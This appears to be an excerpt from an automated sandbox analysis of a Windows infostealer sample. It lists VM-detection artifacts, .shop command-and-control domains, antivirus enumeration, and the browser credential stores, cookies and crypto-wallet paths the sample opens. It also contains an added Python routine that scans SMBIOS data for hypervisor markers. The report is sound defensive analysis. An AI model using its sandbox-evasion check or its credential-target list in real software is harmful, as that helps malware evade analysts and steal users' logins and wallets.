            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe TID: 3168 | Thread sleep time: -150000s >= -30000s
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe TID: 1068 | Thread sleep time: -30000s >= -30000s
            Source: Amcache.hve.3.dr | Binary or memory string: VMware
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845085815.0000000004291000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.3.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_00433CC0 LdrInitializeThunk
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D0D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_041D092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Code function: 0_2_042654B3 push dword ptr fs:[00000030h]
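The FirmwareTableInformation query above is the system-information class that GetSystemFirmwareTable('RSMB') uses to hand a caller the raw SMBIOS table, and the BIOS (Type 0) and System (Type 1) records in that table carry exactly the vendor strings the Amcache hive lists (BiosVendor VMware, Inc., SystemProduct VMware20,1). What follows is an added example, not code from the sample or from Joe Sandbox: a parser for that RawSMBIOSData blob and a scan of the Type 0 and Type 1 string fields for hypervisor markers, which is the check such a query usually feeds. Both blobs are constructed by hand (the real call exists only on Windows), the marker list is an assumption, and nothing here claims to reproduce the sample's own comparison logic.

```python
"""Parse a raw SMBIOS blob of the kind GetSystemFirmwareTable('RSMB') returns and
scan its BIOS/System records for hypervisor vendor strings.

Added example for this report; not code from the sample or from Joe Sandbox.
On Windows the blob would come from
    kernel32.GetSystemFirmwareTable(0x52534D42, 0, buf, size)   # 'RSMB'
Here both blobs are constructed by hand so the parser runs anywhere.
"""
import struct
from dataclasses import dataclass

RSMB_HEADER = '<BBBBI'      # Used20CallingMethod, SMBIOSMajor, SMBIOSMinor, DmiRevision, Length
STRUCT_HEADER = '<BBH'      # Type, Length (header + formatted area), Handle
BIOS_INFO, SYSTEM_INFO, END_OF_TABLE = 0, 1, 127

# Assumed marker list covering common hypervisors; the sample's own list is not on the page.
VM_MARKERS = ('vmware', 'virtualbox', 'vbox', 'innotek', 'qemu', 'kvm', 'xen',
              'parallels', 'bochs', 'virtual machine')


@dataclass
class SmbiosStructure:
    stype: int
    handle: int
    formatted: bytes        # header + formatted area, exactly Length bytes
    strings: list           # the structure's string set, in index order

    def string(self, offset):
        """Resolve the 1-based string index stored at `offset` (0 means no string)."""
        idx = self.formatted[offset]
        return self.strings[idx - 1] if 1 <= idx <= len(self.strings) else ''


def parse_raw_smbios(blob):
    """Walk RawSMBIOSData: 8-byte header, then structures until the End-of-Table record."""
    _used20, _major, _minor, _dmi, length = struct.unpack_from(RSMB_HEADER, blob, 0)
    table = blob[8:8 + length]
    out, off = [], 0
    while off + 4 <= len(table):
        stype, slen, handle = struct.unpack_from(STRUCT_HEADER, table, off)
        if slen < 4:
            raise ValueError('malformed SMBIOS structure at offset %d' % off)
        formatted = table[off:off + slen]
        # String set: NUL-terminated strings, closed by an empty string (a double NUL).
        pos, strings = off + slen, []
        while True:
            end = table.index(b'\x00', pos)
            if end == pos:
                pos += 1
                break
            strings.append(table[pos:end].decode('ascii', 'replace'))
            pos = end + 1
        if not strings:         # no strings at all: the set is exactly two NULs
            pos += 1
        out.append(SmbiosStructure(stype, handle, formatted, strings))
        if stype == END_OF_TABLE:
            break
        off = pos
    return out


def firmware_identity(blob):
    """Pull the fields a VM check compares: BIOS vendor/version/date, system maker/product/serial."""
    ident = {}
    for s in parse_raw_smbios(blob):
        if s.stype == BIOS_INFO:            # offsets per SMBIOS Type 0 layout
            ident['BiosVendor'] = s.string(4)
            ident['BiosVersion'] = s.string(5)
            ident['BiosReleaseDate'] = s.string(8)
        elif s.stype == SYSTEM_INFO:        # offsets per SMBIOS Type 1 layout
            ident['SystemManufacturer'] = s.string(4)
            ident['SystemProduct'] = s.string(5)
            ident['SystemSerial'] = s.string(7)
    return ident


def vm_indicators(ident):
    """Return (field, marker) pairs for every field that contains a hypervisor marker."""
    hits = []
    for key, value in ident.items():
        low = value.lower()
        hits.extend((key, m) for m in VM_MARKERS if m in low)
    return hits


def _structure(stype, handle, formatted_tail, strings):
    header = struct.pack(STRUCT_HEADER, stype, 4 + len(formatted_tail), handle)
    strset = b''.join(s.encode() + b'\x00' for s in strings) + b'\x00' if strings else b'\x00\x00'
    return header + formatted_tail + strset


def build_blob(vendor, version, date, manufacturer, product, serial):
    """Assemble a minimal but spec-shaped RawSMBIOSData blob (Type 0, Type 1, Type 127)."""
    # Type 0: vendor idx, version idx, start segment, date idx, ROM size, characteristics, ext, versions
    bios = struct.pack('<BBHBBQBBBBBB', 1, 2, 0xE000, 3, 0xFF, 0, 0, 0, 0xFF, 0xFF, 0xFF, 0xFF)
    # Type 1: manufacturer idx, product idx, version idx (none), serial idx, UUID, wake-up, SKU, family
    system = struct.pack('<BBBB', 1, 2, 0, 3) + bytes(16) + b'\x06' + b'\x00\x00'
    table = (_structure(BIOS_INFO, 0x0000, bios, [vendor, version, date])
             + _structure(SYSTEM_INFO, 0x0001, system, [manufacturer, product, serial])
             + _structure(END_OF_TABLE, 0x0002, b'', []))
    return struct.pack(RSMB_HEADER, 0, 3, 2, 0, len(table)) + table


# Constructed from the BiosVendor/SystemProduct/serial strings the Amcache hive in this report records.
SANDBOX_BLOB = build_blob('VMware, Inc.', 'VMW201.00V.20829224.B64.2211211842', '11/21/2022',
                          'VMware, Inc.', 'VMware20,1',
                          'VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0')
# Constructed bare-metal-looking values; the vendor and model names are hypothetical.
LAPTOP_BLOB = build_blob('American Megatrends Inc.', '1.07', '03/14/2023',
                         'Example Laptops Ltd.', 'EL-14', 'EL14-000123')

if __name__ == '__main__':
    for name, blob in (('sandbox', SANDBOX_BLOB), ('laptop', LAPTOP_BLOB)):
        ident = firmware_identity(blob)
        print(name, ident, vm_indicators(ident))
```

Run as is, the sandbox blob reports vmware hits on BiosVendor, SystemManufacturer, SystemProduct and SystemSerial while the laptop blob reports none. The defensive counterpart on an analysis VM is to patch those same strings in the hypervisor's SMBIOS configuration, since a marker scan like this one is all the sample needs to decide it is being watched.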

            HIPS / PFW / Operating System Protection Evasion

            Source: o7b91j8vnJ.exe | String found in binary or memory: tolerateilusidjukl.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: productivelookewr.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: strollheavengwu.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: demonstationfukewko.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: liabilitynighstjsko.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: alcojoldwograpciw.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: incredibleextedwj.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: shortsvelventysjo.shop
            Source: o7b91j8vnJ.exe | String found in binary or memory: shatterbreathepsw.shop
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1701691408.0000000004349000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1701622327.0000000006825000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.3.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "ez": "ExodusWeb3"
            Source: o7b91j8vnJ.exe, 00000000.00000002.1843063129.0000000000196000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: 7Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: o7b91j8vnJ.exe, 00000000.00000003.1649760778.0000000004324000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "keystore"
            Source: o7b91j8vnJ.exe, 00000000.00000002.1843063129.0000000000196000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: 6AC:\Users\user\AppData\Roaming\Ledger Live+
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
